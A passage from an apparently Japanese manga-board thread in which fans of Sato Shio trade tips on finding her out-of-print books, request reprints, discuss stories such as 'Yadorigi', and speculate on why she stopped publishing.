ミノル「ここの中華粥、絶品だよ(大意)」
       ↑
すごーく美味しそうだったw

たしかヒカルのおごりで、アイツー内のどっかのレストランでの会話。

215 :花と名無しさん:2006/12/08(金) 21:42:14 ID:???0
楽天フリマにたくさん出品されていた佐藤さんの漫画は今どこに。
欲しいもの全部片っ端から買っとけばよかった。
楽天なんか嫌いだ。
増刷してくれない出版社も嫌いだ。

216 :花と名無しさん:2006/12/08(金) 23:35:01 ID:???0
私はまんだらけとヤフオクで揃えてる最中。
しかし「竜の夢〜」は手が出ない。\7000以上のプレミア付いてるんだもん

217 :花と名無しさん:2006/12/09(土) 19:18:00 ID:???0
うひぇーマジ?
オレ持ってるの売ろうかな・・・




イヤイヤイヤイヤダメダメダメダメ

218 :花と名無しさん:2006/12/09(土) 19:29:39 ID:???0
「竜の夢〜」ってそんなことになってるのか!
自分も同居人も持ってるんで、うちには二冊あるんだよな。
これはどっかに放出した方が、世のファンのためだろうか。

219 :花と名無しさん:2006/12/09(土) 21:33:28 ID:???0
ヤフオクやらないから、アマゾンで出して下さいませんか。

220 :花と名無しさん:2006/12/10(日) 01:52:09 ID:???0
「竜の夢〜」は佐藤さんの絶版本の中でも飛び抜けて高い
相場相当かはわかんないけど、こないだヲチしてたやつ
↓ \6800スタート高杉!! って思ってたら更に競ってるし
http://page10.auctions.yahoo.co.jp/jp/auction/m38940939

221 :花と名無しさん:2006/12/10(日) 14:22:45 ID:???0
>>215
出版社も商売だから仕方ないんだよ
勘弁してやってくれないか

222 :花と名無しさん:2006/12/10(日) 17:03:57 ID:???0
竜の夢〜
以前お世話になったネット古書店数店今見てみたら
どこも売り切れ状態だった
でも5000円ぐらいだった オクより安いよ
再入荷待ってみてはどう?リクエストしておくと
結構お値打ちで入るよ って古書店の回し者じゃないけどね

223 :花と名無しさん:2006/12/11(月) 00:01:02 ID:???0
私も古書店で5000円くらいで買いました。
案外ぐぐってると出てくるよー。

224 :219:2006/12/11(月) 00:56:30 ID:???0
そっか、みなさんどうもありがとう。
もっとちゃんと検索してみます。
リクエストができるとは知らなかったよ。
もう一息二息、頑張ってみます。

225 :花と名無しさん:2006/12/12(火) 21:37:00 ID:???0
今日、アリス・ブックTを手に入れた。
これで、佐藤史生の作品は、完全補完したとおもう・・・
しかし、コミックスになったら買おうとして、アリス・ブックTをスルーしてしまい
手に入れるまで15年、長かったなぁ〜
コミックスになっていないのは、「雨の竜」と「竜の姫君」だけだと思うんだけど
他にあったっけか?
ちなみに、「雨の竜」は、話題の「竜の夢〜」を持ってるので・・・

226 :花と名無しさん:2006/12/15(金) 19:37:35 ID:???0
>>196
エジプトではないのですが、自分もそっくりな像を見たことがあります。
NHKか何かの番組で、一瞬だけだったのですが、たしか獣頭神像とかいう名前で、中国か、朝鮮半島の土偶だったような・・・?
犬・馬・鳥・蛇頭の焼き物で、見たときは本当にそのまんまだー、と思った記憶があります。

もう一度見たくて、あちこち探しているのですが、なかなか見つけることができないでいます。


227 :花と名無しさん:2006/12/18(月) 14:53:38 ID:???0
朝日新聞の「ミイラと古代エジプト展」のトップページに
それらしき焼き物が載ってるね。

228 :花と名無しさん:2006/12/21(木) 14:26:06 ID:???0
神社乗っ取り事件でお稲荷様→ワン・ゼロのことを思い出してしまった

229 :花と名無しさん:2006/12/24(日) 10:50:54 ID:???0
諸星大二郎スレでちょっと話題に上がってたので報告してみる

230 :花と名無しさん:2006/12/27(水) 10:35:46 ID:???0
少女漫画板の某スレって、
新しくなるたびに必ずだれかがウイルスコード入れるんだな
恨みでもあんのかなー

スレ違いだけど愚痴ってみる

231 :花と名無しさん:2006/12/27(水) 14:25:13 ID:???0
ああ読んでる
他のお気に入り作家の名前があがったりするけど被るわ

232 :花と名無しさん:2007/01/03(水) 00:35:40 ID:???0
あけまして、おめでとうございます。

TVの越年番組見てると、早池峰山の松やらなんやら、百鬼の衆を招集したくなる。

233 :花と名無しさん:2007/01/05(金) 14:57:46 ID:???0
百鬼の衆を前にルシャナが演説しているシーンを、いつも長いこと眺めて楽しんでしまうw
なめくじやら蛙やら、得体の知れない鬼がたくさんいるのがなんとも想像力をかき立てられる。

234 :花と名無しさん:2007/01/05(金) 18:57:55 ID:???0
あのシーン、いいよね。


235 :花と名無しさん:2007/01/05(金) 20:08:52 ID:???0
あの、つくばのガマ石の説明がいいよね。
ああいうのだったら、あちこちにいっぱいいそう、と思える。

236 :花と名無しさん:2007/01/05(金) 21:22:10 ID:???0
>>235
いっぱいいますよ
それが地域神や自然神
本来の八百万の神々

天皇を起点とする国家神道とは似て非なるもの

237 :花と名無しさん:2007/01/11(木) 06:26:12 ID:???0
画集の竜の夢その他の夢、再刊してくれないかな。
山岸・萩尾さんのが再刊されてるの見て羨ましくなって来た…
みなさんでリクエストしませんか?(もうしてたらスマソ
http://www.fukkan.com/fk/VoteDetail?no=188


238 :花と名無しさん:2007/01/23(火) 00:55:49 ID:???0
保守がてら・・
ttp://d.hatena.ne.jp/lepantoh/20061230#1167413167
某作家がブログで特別賞を進呈されてます

239 :花と名無しさん:2007/01/23(火) 16:25:18 ID:???0
この人のブログ読んでるw
でも作家なんて知らなかった
趣味で評論やってんのかと思ってたよ

240 :花と名無しさん:2007/01/30(火) 21:56:58 ID:???0
いや某作家=佐藤センセ じゃないのかな?

241 :花と名無しさん:2007/01/30(火) 22:27:40 ID:???0
プロフィール見ても書いてないようだけど、作家なのこの人?

テレプシコーラに手厳しいのが気になった…

242 :花と名無しさん:2007/01/30(火) 23:00:40 ID:???0
よく読むと分かるよ、T橋G一郎だって>風呂具

243 :花と名無しさん:2007/01/30(火) 23:14:06 ID:???0
え、マジ!<T橋G一郎
よく読んでないけど読んでもわからんかったかも……
教えてくれてサンクス

244 :花と名無しさん:2007/01/31(水) 10:33:48 ID:???0
この人かなり前の萩尾スレで自らのトーマ論繰り広げてなかった?
普通にお勤めしてる若い女の子なのかなーなんて思ってた

245 :花と名無しさん:2007/01/31(水) 12:30:06 ID:???0
てか違うだろ>高橋源一郎
自分のブログで高橋源一郎の講演会行ってきましたって書かないしw
プロフィールに自ら女だって言及してるよ。

>>241
ギシ先生の作品が嫌いらしいからかもしらんが・・・、ちょとアレは無いだろと思った>テレプシ

246 :花と名無しさん:2007/01/31(水) 12:37:14 ID:???0
つーか冨樫信者ってすごいなと思ったw

247 :花と名無しさん:2007/01/31(水) 13:18:15 ID:???0
一緒にしないでほしい

248 :花と名無しさん:2007/01/31(水) 13:26:17 ID:???0
冨樫夫妻がどんな非常識なことをしても許せるんだね。
妄信者。

249 :花と名無しさん:2007/01/31(水) 15:04:40 ID:???0
すまんが話がみえん。
>>238のブログの人が冨樫信者で、アンチ山岸な訳ですか?
それと佐藤史生になんの関係が?

250 :花と名無しさん:2007/01/31(水) 20:44:05 ID:???0
日記内を佐藤史生で検索してみますた
http://d.hatena.ne.jp/lepantoh/searchdiary?word=%BA%B4%C6%A3%BB%CB%C0%B8&.submit=%B8%A1%BA%F7&type=detail


251 :花と名無しさん:2007/02/01(木) 00:13:20 ID:???0
なぜそこまで特定のブログの話題にこだわるの?

252 :花と名無しさん:2007/02/01(木) 09:52:34 ID:???0
自分の好きなものは皆が誉め、嫌いなものは皆が貶し
更に佐藤さんを唯一神としないと気がすまない人がいるってことでしょう

253 :花と名無しさん:2007/02/01(木) 19:28:20 ID:???0
>>251過疎スレだからだよ

「レナード現象〜」の感想もなんか意味不明だな

254 :花と名無しさん:2007/02/02(金) 00:02:13 ID:???0
どう見てもただの漫画読みでしょ。内容偏りすぎてるし素人分析の感想の羅列じゃん。
つかプロ作家だったらプロフィール画像に望都さんの絵を無断借用したりせんでしょ

255 :花と名無しさん:2007/02/02(金) 17:15:55 ID:???0
「竜の姫君」「雨の竜」を今更ながら読みました。
短編ではもったいない位面白かった・・・・・・

続きがす〜〜〜〜〜〜っごく気になるんですがw
姫、漢前だ。

256 :花と名無しさん:2007/02/03(土) 01:04:09 ID:???0
>>255
アスカ、タジオンとフェーベに似ててうれしい

257 :花と名無しさん:2007/02/03(土) 21:05:03 ID:???0
クーデターしに引き返した王子はどうなったのか。

258 :花と名無しさん:2007/02/03(土) 21:20:20 ID:???0
今日は鬼遣らいの日

259 :花と名無しさん:2007/02/05(月) 00:31:00 ID:???0
>>257
王座をもぎとり、後に周辺国を併呑し、モルダン帝国の初代皇帝として讃えられる。とか?

260 :花と名無しさん:2007/02/05(月) 21:34:53 ID:???0
>>259
それもいいね。

261 :花と名無しさん:2007/02/06(火) 02:17:19 ID:???0
>「竜の姫君」「雨の竜」

再犯して欲しい…じゃない再版だ
これだけ読めてないんだよね

262 :花と名無しさん:2007/02/06(火) 07:02:48 ID:???0
>>261
「天界の城」の様に短編集でも出してほしい

古本で読んだけど、著者にはおカネいかないしさ

263 :花と名無しさん:2007/02/06(火) 21:22:23 ID:???0
どこかで連載してくれないかな。ぜったいに買う!
「竜の姫君」「雨の竜」にも続きというか
構想はあるんでしょ?

264 :花と名無しさん:2007/02/07(水) 17:57:35 ID:???0
ttp://d.hatena.ne.jp/seijotcp/20070131/p2#seemore
トリアーの映画のレビュー
映画は未見なんだけどなんとなくやどり木思い出した
あれ読むとぐるぐる考えてしまう
シュネの意見に同意するとこもあるけどなんか納得はできない…
自分が佐藤キャラみたいに頭良くないからかな

265 :花と名無しさん:2007/02/07(水) 18:28:47 ID:???0
やどり木やアレフ読むと、無性に腹が減るw
エメラルドオレンジに、ごうせいなバターの香りのするクッキー、まっさらな小麦を使ったまんじゅうに、
ナッツペーストをオイルでといた海草のサラダ・・・。

266 :花と名無しさん:2007/02/07(水) 18:42:38 ID:???0
「人並みの幸福」ってやつも「自由」なわけじゃないしねぇ
社会の一員としてそれなりの役割を演じることを要求されるわけで

267 :花と名無しさん:2007/02/09(金) 23:37:32 ID:ypd7Wpbx0
やどり木もアレフもいいよね〜
エメラルドオレンジ食べたい!
雑誌に描かなくていいから単行本で新作出して欲しい!
絶対買う!約束する!で、ネットで感想UPして販売促進
するから


268 :花と名無しさん:2007/02/10(土) 18:47:38 ID:???0
>>264
納得もなにも、あの惑星に住む以上選択の余地はないんじゃね?

今は希望者や選ばれた者だけが宿脳人を目指すシステムのようだけど、
いずれは誰もがそうなるよう進化(変化)するんだろう
それで初めてホモ・サピエンスでも地球人でもない、ハンザ人が誕生する


269 :花と名無しさん:2007/02/10(土) 18:57:18 ID:???0
かつて地球人の一部が、地球人的価値観での生き方を嫌ってハンザに移り住んだように
ハンザ人としての生き方はイヤだ、というハンザに住む人の一部は
ハンザから離れていくんじゃないかな。
もちろん、いやだと思った人の全部が離れられるわけじゃないだろうし
その選択がどういう結果になるかは誰にも判らないだろうけど。

270 :花と名無しさん:2007/02/10(土) 18:59:52 ID:???0
志村ーハザンハザン

271 :花と名無しさん:2007/02/10(土) 19:04:47 ID:???0
しまったー!

272 :花と名無しさん:2007/02/26(月) 02:06:25 ID:???0
とりあえずホシュ

273 :花と名無しさん:2007/02/27(火) 18:28:30 ID:???0
ハンザというと、涅槃通りにある、帽子や舞台衣装を売っている店だな

274 :花と名無しさん:2007/02/28(水) 21:14:48 ID:???0
あいつは尾羽打ち枯らしてる時にももててた

275 :花と名無しさん:2007/03/06(火) 19:17:17 ID:???0
若い以下


276 :花と名無しさん:2007/03/07(水) 23:00:14 ID:???0
この作者って今も何か描いてるの?
もしくは引退したの?それとも、もう亡くなったとかなのかな
最近作品を読んで存在を知ったばかりのにわかファンなので、近況を知りたい

277 :花と名無しさん:2007/03/07(水) 23:34:53 ID:???0
5年か6年(もっと?)ぐらい前にwebでインタビューに答えてなかったっけ。
このスレの人の質問がひとつあったような記憶があるけど。

278 :花と名無しさん:2007/03/09(金) 01:12:52 ID:Msx1W8880
生きてらっしゃるはず。
だから新作描いてくれ〜。

279 :花と名無しさん:2007/03/09(金) 13:32:35 ID:???0
情報ありがとうございます〜
そうですね、描いて欲しい。
この人の漫画ってこの人しか描けないって感じがする。

280 :花と名無しさん:2007/03/09(金) 13:55:20 ID:???0
そうなんだよね。
似た作品だと紹介されて、試しに読んでみてもがっかり。
亜流の人がいれば少しは浮気もできそうなもんだけど、万年飢餓状態です。

281 :花と名無しさん:2007/03/09(金) 16:59:24 ID:???0
ハーレクィン・ロマンス好きだな
弥生さんと周子さんのやりとりがすごく面白い
作者が徹底的な第3者視点でキャラを描いてるところがすごいと思う
パパの元奥さんには超同情するが

282 :花と名無しさん:2007/03/10(土) 14:13:56 ID:???0
お目々パッチリの絵柄でなくてよかった。

でも、佐々木淳子も好きだけど。

283 :花と名無しさん:2007/03/23(金) 01:23:16 ID:y0JFzzX20
桜の季節になると、
「春を夢見し」を読みたくなる。

284 :花と名無しさん:2007/03/26(月) 13:47:58 ID:???0
清原なつのさんも久しぶりに連載始めたことだし
佐藤さんもせめてマンガ描いてほしいなあ

285 :花と名無しさん:2007/03/27(火) 10:16:09 ID:???0
「せめてマンガ」って、マンガ以外に何を望んでいるんだ?

286 :花と名無しさん:2007/03/27(火) 10:18:10 ID:???0
「せめて」どころか漫画以上に求めてるものなんてないなw

287 :花と名無しさん:2007/03/27(火) 21:51:44 ID:???0
「怪獣戦士ギンダム」というパチモン臭いタイトルで
実はバリバリの超SFという新作が読みたいよぉ。

288 :花と名無しさん:2007/03/28(水) 00:00:20 ID:???0
連載は無理でもせめて読切くらいって意味だろうと脳内保管してた

289 :花と名無しさん:2007/03/28(水) 00:02:52 ID:???0
>>287
すっごい読みたくなってきた…

290 :花と名無しさん:2007/03/28(水) 00:04:47 ID:???0
>>288
なるほど

291 :花と名無しさん:2007/03/28(水) 06:35:42 ID:???0
佐藤史生さんのインテリアデザインも見てみたいなぁ
シンプルで気持ちよさそう

292 :花と名無しさん:2007/04/04(水) 17:07:32 ID:???0
夢みる惑星の石造りの建物、佐藤史生デザイン(?)で見てみたい。
石造り建築は萩尾望都も素敵なの描いてるけど、
それらの見取り図を見てみたいものです。


293 :花と名無しさん:2007/04/04(水) 23:13:59 ID:???0
城一つで街みたいだな

294 :花と名無しさん:2007/04/04(水) 23:21:52 ID:???0
ヨーロッパの城ってのは街込みだから
西洋風ファンタジーのリアリティだね

295 :花と名無しさん:2007/04/12(木) 01:17:23 ID:???0
記念ぱぴこ

雨が降っていて、真っ赤な百日紅がぼとぼと落ちて、
白ブリの若い男がぎらりと光るナイフをぺろっと。
凄い映像だな〜って思いました。忘れられません。
色彩が俳句や短歌に通じる美しさを持っているし、
すべてが象徴的で、緊迫感があって、どんな映画監督
にも負けないって思います。
最近はどうなさっていますか?新参者です。質問お許しください。


296 :花と名無しさん:2007/04/14(土) 11:02:04 ID:???0
何の誤爆か当てっこしようか

297 :花と名無しさん:2007/04/14(土) 11:24:53 ID:???0
なんとなく山岸っぽい

298 :花と名無しさん:2007/04/14(土) 11:37:10 ID:???0
?
「おまえの優しい手で」の話じゃないの?

299 :花と名無しさん:2007/04/14(土) 17:42:20 ID:???0
ソレダッ!

300 :花と名無しさん:2007/04/14(土) 18:00:06 ID:???0
>>295
最近のコミックスは2000年暮れに刊行の「魔術師さがし」
以降、新作の露出はない模様です

301 :花と名無しさん:2007/04/14(土) 18:57:39 ID:GCFbZFjM0
2000年からかー 今年こそ新作希望!
切なる願い

302 :花と名無しさん:2007/04/14(土) 21:35:37 ID:???0
チェンジリング好きだー
あのコンビの話読みたい

303 :花と名無しさん:2007/04/14(土) 21:44:18 ID:???0
「tit for tat」映画化してくれぇ

304 :花と名無しさん:2007/04/15(日) 03:36:36 ID:???0
七生子シリーズとか青猿記とか、昔、友達から借りて一度読んだっきりだ。
もう一度読みたいけど、手元にないんだよなー。入手できないよねえ……。

305 :花と名無しさん:2007/04/15(日) 14:20:02 ID:???0
オクで網を張るか、あるいは
あちこち出かけて古本屋を見るたびに飛び込み
しらみつぶしに探すというようなことを半年〜1年も続ければ
だいたい揃うよ

306 :花と名無しさん:2007/04/18(水) 00:43:40 ID:???0
私はマニアックなマンガ喫茶で読みました
いつか復刊するとか「続・天界の城」出さんかねえ・・・

307 :花と名無しさん:2007/04/19(木) 00:13:03 ID:???0
マンガ喫茶ってどこも同じだと思ってた
個性的なお店もあるんだね、知らなかったよ

308 :花と名無しさん:2007/05/04(金) 10:46:22 ID:???0
>>306
心臓のない巨人などは最近読んだSF漫画では一番面白いと思った
といってももう8年も前の話だけど…。

吾妻ひでおの復刊で少しは儲かったんだろうからハヤカワ文庫に期待したいのだけど
いつになるのやら。

309 :295:2007/05/08(火) 13:27:29 ID:???0
300さん

ありがとうございます。「魔術師さがし」ですね!!探してみます。
私の中の「サトウシオ」が切れています。やはりオークションしか無いですね・・・


310 :花と名無しさん:2007/05/08(火) 17:34:40 ID:???0
テーブルに常に置いたりしてね

311 :花と名無しさん:2007/05/12(土) 17:34:26 ID:???0
魔術師さがしは一応在庫アリなんだよね
自分は知らなくてオクで落としたので
実際買えるかわからんとです
ttp://www.s-book.com/plsql/com2_detail?isbn=409172213X

312 :花と名無しさん:2007/05/12(土) 23:00:42 ID:???0
魔術師さがし他、自分はそこでまとめて購入したよ。他では取り寄せ不可のもあったので。
かなり前のことだけど、その時も<ご注意>付きだった。

「心臓のない巨人」は在庫なしになってしまったのだね。

313 :花と名無しさん:2007/05/14(月) 15:36:29 ID:???0
ブックオフをこまめに見ていると結構出てる
100円とかでも

314 :花と名無しさん:2007/05/24(木) 22:01:44 ID:???0
100円で春を夢見し手に入れたら、どなたかの蔵書印が押してあったな〜

315 :花と名無しさん:2007/06/02(土) 03:57:08 ID:???0
し…新作を…頼む…ゲホゲホ

316 :花と名無しさん:2007/06/02(土) 21:20:31 ID:Fa+Ga8vP0
10年くらい前から、ぱったり描かなくなってるよね?
優れたマンガを描いていらしたので残念。
なんで描かなくなったの?
まさか死んだとか?

317 :花と名無しさん:2007/06/02(土) 22:23:02 ID:???0
>316
いやいやいや、なんつーことを

すぐ上で話題になってる「魔術師さがし」は2000年12月出版(7年前)。
雑誌掲載は2000年の初め
元々どちらかといえば寡作な人だけど、10年も開いてないw

318 :花と名無しさん:2007/06/02(土) 23:23:59 ID:???0
PFは別コミと合併しちゃったし編集者とのパイプがとぎれてしまったのかも知れんね

319 :花と名無しさん:2007/06/03(日) 00:17:55 ID:???0
編集者とのパイプ切れは…小学ではなさそうな話だけど、佐藤さんの作風が
浮かない雑誌が今無くて載せらんないのでは、という感じはする。

ハヤカワから文庫出てるんだし、SFマガジン掲載とかでも良いのになぁ。

320 :花と名無しさん:2007/06/03(日) 00:29:29 ID:???0
SFマガジン!
イイ 。゚+.(・∀・)゚+.゚イイ!!


321 :花と名無しさん:2007/06/03(日) 00:34:12 ID:???0
それイイね。定期購読するする!!!

322 :花と名無しさん:2007/06/03(日) 00:37:37 ID:???0
じゃ、既に定期購読してる私が愛読者カードの※欄に熱烈要望を書いてくる。
掲載要望が多ければハヤカワの中の人は結構真摯に交渉してくれるらしいよ

323 :花と名無しさん:2007/06/03(日) 01:16:32 ID:???0
3年ぐらい前に、坂田靖子さんのオリジナル同人誌の
トーンワークを手伝ったらしい。
坂田さんの本のあとがきに書いてあった。

324 :花と名無しさん:2007/06/03(日) 01:18:13 ID:???0
同人誌でもいいから描いて欲しいなあ…

325 :花と名無しさん:2007/06/03(日) 16:22:57 ID:3SdZmhBW0
なら私もSFマガジン買う!
で熱烈に佐藤史生作品求むって書く

本当に同人でもなんでもいいから新作〜〜
誰か佐藤さんを説得して欲しい
新作出たら絶対買うよ〜〜〜

326 :花と名無しさん:2007/06/03(日) 16:36:46 ID:???O
じゃ、自分はフラワーズ購読してるのでリクエストしてみる。
6月に800ページ以上ある別冊が創刊するらしいので、これまでに比べ望みアリかも!
小学館とのパイプが切れてないといいけど…。
佐藤さんの新作読みたいよ

327 :花と名無しさん:2007/06/03(日) 17:24:41 ID:???0
http://blog17.fc2.com/c/chiquita/file/70601b.jpg

328 :花と名無しさん:2007/06/04(月) 12:44:51 ID:???0
こんなとこにグロ貼る奴も珍しいな
どうせなら過疎ってる時に貼ってくれw

329 :花と名無しさん:2007/06/04(月) 16:14:55 ID:???0
>>304
新書館は期待しないほうが良い。
何年か前にグレープフルーツ誌掲載のを文庫化しないの?って聞いたら
無理っぽい感じだった。

330 :花と名無しさん:2007/06/04(月) 17:24:30 ID:???0
グレープフルーツ! 懐かしいなあ。大好きだったなあ。
「七生子」シリーズ連載してたのはここじゃなかったっけ?
(あれで「亡き王女のためのパヴァーヌ」という曲を知った)



331 :花と名無しさん:2007/06/05(火) 07:58:08 ID:???0
ワンゼロのロボット掃除機が…
http://www.irobot-jp.com/

332 :花と名無しさん:2007/06/05(火) 08:43:30 ID:???0
懐かしくなって「七生子」シリーズ久しぶりに読んだよ。
既出だと思うけど十二国記を初めて読んだ時
「夢喰い」を思い出したなー

333 :花と名無しさん:2007/06/05(火) 22:20:36 ID:???0
佐藤史生さん自身にそれほど創作意欲がないかもしれんな
もともと寡作だし

あんまり言いたくはないけれど女性だし

334 :花と名無しさん:2007/06/05(火) 22:22:33 ID:???0
333の「女性だし」というのは、
創作活動に割く時間を一般に女性はつくりにくい、という意味です

男女の能力差や勤労意欲についてではありません
念のため

335 :花と名無しさん:2007/06/05(火) 22:56:47 ID:OAfXr5ps0
え?でも佐藤さんって独身でしょう?
創作活動時間って、生活全部創作活動時間じゃないの?

もしかして結婚してんの?私が知らなかっただけ?
生活費の心配あんまりしなくていいってこと?

教えて下さい<(_ _)>

336 :花と名無しさん:2007/06/05(火) 23:54:27 ID:???0
れ?佐藤さんは既婚者じゃなかったっけ?
それは烏図さんか?

まあ335には、嫁にいってなくてもコナシでも、
親の介護っつー家事労働は生じたりもするぞ、
年取るトナー、と言っておこう。

337 :花と名無しさん:2007/06/06(水) 00:30:26 ID:???0
烏図さんがインド人とケコンしたという話はGFで読んだ
佐藤さんに関しては聞いたことがないな
プライベート露出しない人だししててもしてなくてもおかしくはないが

一番最近の消息は去年だか一昨年だかもっと前だかになんかのサークルで
イベント的にショップ開いてグッズを売ったとかいう話だな
そしてそのショップに顔を出したとか出さないとか
ネタもとはここだっけ?
それが東京だったからすくなくとも数年前には
東京近辺に住んでいた公算が高いかと

338 :花と名無しさん:2007/06/06(水) 10:14:17 ID:???0
>>337
そのイベントショップ行きましたよ。吉祥寺であったイベントのことだと思います。
坂田靖子さんのグッズ目当てで行ったのですが、佐藤史生さんのポストカードも売られていて迷わず買いました。
ミノみたいな男の人のイラストだったかな?
ご本人はイベント中一度も顔を出さなかったみたいなので(他の漫画家さんは何人かいらしていた)、東京近辺にお住まいではないのかな〜?と思います。


339 :花と名無しさん:2007/06/06(水) 18:44:00 ID:???0
七生子シリーズ……もいっかい読みたい……。
でも、新作は、もっと読みたい……。

1948年生まれの青池保子センセがまだ現役(?)で頑張っておられるのだし、
1952年生まれの佐藤さんも是非とも頑張っていただきたい……。

340 :花と名無しさん:2007/06/06(水) 21:19:06 ID:???0
>>335
佐藤さんが未婚か既婚かは知らないが、
一般に既婚よりむしろ独身女性のほうがよっぽど親の介護にはアテにされる
結婚してれば、
自分の家庭や、ダンナの親という「言い訳」もできるからね

341 :花と名無しさん:2007/06/06(水) 21:29:03 ID:???0
>>335
それと、下世話な推測だが
佐藤さんが過去の作品の印税だけで生活しているとは思えない
寡作だし、付随的な作品(アニメ等)もないし

だから、別の仕事をもっている可能性は大きい(あるいは、専業主婦か)
いずれにしろ、

>創作活動時間って、生活全部創作活動時間じゃないの?

という可能性は低いと思います
(もともと資産家とかいうのであれば、それはまた別の話)

342 :花と名無しさん:2007/06/06(水) 22:17:18 ID:???0
佐藤さん、あの独特の発想とセンスを生かして文筆の方へとか……。
漫画は、高齢になると目と手が弱って量産はキビシイみたいだが
小説とかなら、50〜60代の小説家なんてざらにいるし……。
ただ、受け皿があるかどうかだよな……問題は。

343 :花と名無しさん:2007/06/06(水) 23:26:49 ID:???0
>>342
文筆業になっていたら、ちゃんと見つけられない自分を情けなく思うのは置いておいてw、
よかったと思う。あの才能を放置するのはよくない、もったいなすぎるよ。
早くからPC使ってたし、タイピングも慣れたもんじゃないかと勝手に推測。
だから
だから・・・文章だけでいいから作品読ませて欲しい!!!

344 :花と名無しさん:2007/06/12(火) 17:53:29 ID:???0
キャベツ畑の遺産相続人で男はキョーミネーと豪快に宣言してた魔女の方は
さとさんがモデルだと聞きましたが、ほんとですか?
で、眼鏡の魔女は竹宮さんで、もう一人はわがんねべし。

345 :花と名無しさん:2007/06/12(火) 22:05:06 ID:???0
>>344
増山のりえでしょ。

346 :花と名無しさん:2007/06/15(金) 12:51:09 ID:???0
最近は諸星大二郎さんが漫画だけではなく小説も発表しているようだけれど

個人的には、漫画家には漫画を書いてほしいなぁ
エッセイとかならまた別の話だが



347 :花と名無しさん:2007/06/16(土) 00:16:36 ID:???0
>>342-343
漫画家より小説家を下に見てるようで少々不愉快


348 :花と名無しさん:2007/06/16(土) 00:24:01 ID:ORZBvBUa0
347さん
え!小説家を見下してないはずですよ
この版の人は純粋に漫画中心の生活なんだと思います
つまり小説より漫画が好きなだけで、趣向の問題だと
思います

そんな私はディープに漫画好き♪

349 :花と名無しさん:2007/06/16(土) 00:29:40 ID:???0
別にそんなこといっていないと思うのだが・・・
漫画ファンはやはり漫画の新作を求めるというだけの話でしょう。
漫画と文章は違うものだからさ。

350 :花と名無しさん:2007/06/16(土) 00:48:31 ID:???0
小説より漫画が好き、とかそういうことじゃなく
絵が描けなくなったら小説家になれば(・∀・)イイ!!って思想がアレだってことでしょ
漫才と文才は全然別のものだし、文筆業舐めてると思われても仕方ない
もちろん中には両方の才能のある人もいるだろうけどさ

351 :花と名無しさん:2007/06/16(土) 16:45:38 ID:???0
両方の才能がある人…1人も思いつかない……

352 :花と名無しさん:2007/06/16(土) 19:48:06 ID:???0
むかし漫画描いてて小説家になった人てえと

矢作俊彦
小松左京
山田詠美
     ・・・他に誰かいたっけ?

逆パターンの人は思い付かないな 誰かいる?

353 :花と名無しさん:2007/06/16(土) 20:54:33 ID:???0
小説を書いた人なら
あさぎり夕、明智抄、猫十字社(頓挫しかかってた気が)……。

354 :花と名無しさん:2007/06/16(土) 21:11:15 ID:???0
 山上たつひこ


355 :花と名無しさん:2007/06/16(土) 21:32:47 ID:???0
岡崎京子

356 :花と名無しさん:2007/06/16(土) 21:34:01 ID:???0
ならやたかし(奈良谷隆)=>黒崎竜・睦月影郎


357 :花と名無しさん:2007/06/16(土) 21:38:06 ID:???0
山田ミネコ

358 :花と名無しさん:2007/06/16(土) 22:35:38 ID:???0
だから、その誰もがどっちかがダメダメでしょうが。
山上たつひこくらいかな、例外は…

359 :花と名無しさん:2007/06/16(土) 22:45:20 ID:???0
おっと折原みとを忘れてた

360 :花と名無しさん:2007/06/17(日) 01:50:12 ID:???0
諸星大二郎も。でもこの人はやはり漫画の方が味があると思った。
伸たまきが自作の一部分を小説化したことがあった。
こちらは面白かったし文章も上手かった記憶がある。

361 :花と名無しさん:2007/06/17(日) 02:47:02 ID:???0
でもなんか違うんだよなマンガとは
全く違う表現方法なんだから当然ではあるんだが
ただマンガと小説の違いを考えるには面白い企画だった

そして結論としては、たとえ作品としてまともに成立しているとしても
マンガでなく小説でよいかと言われたら否
場合によっては別種の面白さがあるということもあるけど

362 :花と名無しさん:2007/06/18(月) 19:16:53 ID:???0
表現方法が違うと言えば・・・
『姑獲鳥の夏』(京極夏彦)って、
もともとは漫画にするつもりだったんだよね、たしか。
ただネタというか仕掛けというかがどう考えても
漫画向きじゃなかったので小説にした、と。
この人の描く妖怪絵はよく見るけど
一度ストーリー漫画も見てみたいものだ。

363 :花と名無しさん:2007/06/18(月) 22:28:39 ID:???0
橋本治も絵ウマいよなー

364 :花と名無しさん:2007/06/22(金) 04:30:53 ID:???0
>347
小説家より漫画家を下に見てるようで少々不愉快

365 :花と名無しさん:2007/06/22(金) 10:09:45 ID:???0
そうまぜっかえすなよw

366 :花と名無しさん:2007/06/22(金) 12:51:58 ID:???0
>>364
流れ見て書け。
あんただじゃなく漫画好きは皆、文意が汲み取れないヴァカばかりだと思われるだろ

367 :花と名無しさん:2007/06/22(金) 13:42:30 ID:???0
>>364
342-343も読んだ上での書き込みとするならば
読解力不足

368 :花と名無しさん:2007/06/22(金) 15:11:03 ID:???0
やどり木はもう読めないのかと思っていたら、家にあった天界の城に収録されてた!
幾何言語パネルしか印象に残ってなかったけど、あんな話だったんだなあ。

369 :花と名無しさん:2007/06/22(金) 17:10:47 ID:???0
やどり木、派手さはないけどすごく好き。
あのあとハザンは長い時間をかけてどんどん変化して行ったんだろうな。
それを、それを読みたい!読ませてくれ佐藤史生!

370 :花と名無しさん:2007/06/22(金) 21:14:55 ID:???0
やどり木、あの学園ものの続きを読んでみたいかも

371 :花と名無しさん:2007/06/22(金) 21:19:53 ID:???0
聖ミスルトの話も読んでみたい
夢が広がんぐ

372 :花と名無しさん:2007/06/22(金) 22:49:28 ID:???0
聖ミスルトの話、神秘的だよね。やどり木の話が神秘だけど。

373 :花と名無しさん:2007/06/26(火) 12:05:57 ID:???0
あのテの話は一歩間違えると
環境至上主義やガイア思想の宗教っぽくなってベタベタと気持ち悪いのだが、
「やどり木」はそのへんサッパリしているのでいい

374 :花と名無しさん:2007/07/01(日) 22:24:23 ID:???0
ブックオフ100円コーナーにワンゼロの文庫があったので手に取ったところ
サインが入っていました
売った人は何を考えていてるんだ

375 :花と名無しさん:2007/07/01(日) 22:34:01 ID:fFk0MUzC0
>374さん
し、信じられない!!! 私に売って!!

376 :花と名無しさん:2007/07/01(日) 22:51:16 ID:???0
おー、いいなぁ
ブコフに売るなんて勿体無い。

377 :花と名無しさん:2007/07/02(月) 00:43:29 ID:???0
ブコフなんかに売ってもよくて50円 下手すりゃタダだろうになぁ

378 :花と名無しさん:2007/07/03(火) 11:14:48 ID:???0
